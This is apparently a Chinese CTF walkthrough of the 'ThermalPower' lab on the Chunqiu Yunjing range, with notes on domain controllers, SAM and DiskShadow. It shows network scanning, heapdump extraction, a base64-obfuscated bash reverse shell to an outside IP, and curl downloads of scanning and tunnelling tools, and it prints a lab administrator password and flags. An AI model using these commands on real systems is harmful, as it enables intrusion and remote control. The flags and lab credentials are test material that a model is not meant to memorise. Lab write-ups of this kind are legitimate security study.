春秋云镜ThermalPower

屏幕截图 2025-03-09 235011

https://yunjing.ichunqiu.com/major/detail/1113?type=1

学习:https://xz.aliyun.com/news/13525

https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

windows安全基础知识小记

之前对系统安全了解比较少,现在从靶场开始了解一下吧。可能这样了解并不会让我很快速并且全面的了解到系统安全的表面。表面是指哪些容易出问题的地方以及如何简单的利用。原理更是不太好理解到。

PS1文件

powershell脚本

https://zhuanlan.zhihu.com/p/693205061

https://www.freebuf.com/sectool/171697.html

域控制器

Domain controller,简称DC是指在计算机网络域内响应安全身份认证请求的网络服务器,负责允许发出请求的主机访问域内资源,以及对用户进行身份验证,存储用户账户信息,并执行域的安全策略。

域控制器中包含了这个域的用户账户、密码和属于这个域的电脑等信息构成的数据库。当电脑连入网络时,域控制器首先要鉴别这台电脑是否是属于这个域,用户使用的登录账号是否存在、密码是否正确。如果以上信息不正确,域控制器就拒绝该用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,只能以对等网用户的方式访问Windows共享的资源,这样就一定程度上保护了网络上的资源。图片1.png

其实域和工作组在结构上很相似,只是表现形式有些不同:

1、工作组:只能将数量不多的电脑连成一个可互相共享资源的网络,在这种工作方式下,信息的安全保护只能靠给共享信息设置密码或将使用权限设置给特殊用户来实现。

2、域:采用域控制器来进行信息管理,每个用户都有自己的账号和密码,并且可根据不同的情况赋予不同的使用权限,这种方式不但使网络信息安全得到了非常好的保障,同时也满足了大中型网络的要求。

SAM

Security Account Manager安全账号管理器

https://www.windows-active-directory.com/windows-security-account-manager.html

Windows 将本地用户和组账户存储并管理在一个名为安全账户管理器(SAM)的数据库文件中。它对本地用户登录进行身份验证。在域控制器上,仅存储其作为服务器时的管理员账户,该账户作为目录服务恢复模式(DSRM)的恢复账户。SAM 数据库位于 Windows 注册表中。

DiskShadow

https://learn.microsoft.com/zh-cn/windows-server/storage/file-server/volume-shadow-copy-service

https://learn.microsoft.com/zh-cn/windows-server/administration/windows-commands/diskshadow

flag01

1
fscan -h 39.98.122.145 -nobr -np

image-20250501144852411

1
python dirsearch.py -u http://39.98.122.145:8080/
1
java -jar heapdump.jar "heapdump" > 1.txt

image-20250501150025821

image-20250501150113845

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/ >find / -name flag*

/flag01.txt
/ >cat /flag01.txt

████ ██ ████ ██
░██░ ░██ █████ █░░░██ ███
██████ ░██ ██████ ██░░░██░█ █░█░░██
░░░██░ ░██ ░░░░░░██ ░██ ░██░█ █ ░█ ░██
░██ ░██ ███████ ░░██████░██ ░█ ░██
░██ ░██ ██░░░░██ ░░░░░██░█ ░█ ░██
░██ ███░░████████ █████ ░ ████ ████
░░ ░░░ ░░░░░░░░ ░░░░░ ░░░░ ░░░░


flag01: flag{c23c5c4c-dfac-4d06-ba5b-b1bc480ad4f7}

flag02

反弹shell

netcat -lvvp 7001

1
bash -c '{echo,YmFzaCAtaSAmPiAvZGV2L3RjcC84MS43MC4zMi4xMTYvNzAwMSAwPiYx}|{base64,-d}|{bash,-i}'

image-20250501151544647

ifconfig

image-20250501151748798

发现

1
python3 -m http.server 80

远程下载fscan

1
2
curl http://81.70.32.116:80/fscan --output fscan
chmod +x ./fscan

扫一下

1
./fscan -h 172.22.17.213/24

image-20250501152130135

1
2
3
4
5
6
7
python3 -m http.server 7002


curl http://81.70.32.116:7002/frpc --output frpc
curl http://81.70.32.116:7002/frpc.toml --output frpc.toml
chmod +x frpc
./frpc -c frpc.toml

image-20250501161237720

1
http://172.22.17.6/

image-20250505153145088

拿到

image-20250505153221152

1
2
3
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

同时得到

1
2
3
4
5
1. 登陆权限限制:
为确保信息系统的安全性,自即日起,公司所有工程师PC的登陆将由SCADA工程师进行控制。请各位工程师注意,只能通过SCADA工程师提供的登陆方式进行访问。

2. 登陆账户设置:
为方便管理和标准化,登陆账户名将采用姓名全称的小写拼音形式。例如,张三的账户名为zhangsan,工号为0801。初始密码将由账户名+@+工号组成,例如,zhangsan@0801。

成功连接

image-20250505153530692

目标环境不出网且为普通用户

image-20250505153704188

flag03

根据可以猜测为双网卡

image-20250505153221152

fscan扫一下

image-20250505161503639

flag{bcd080d5-2cf1-4095-ac15-fa4bef9ca1c0}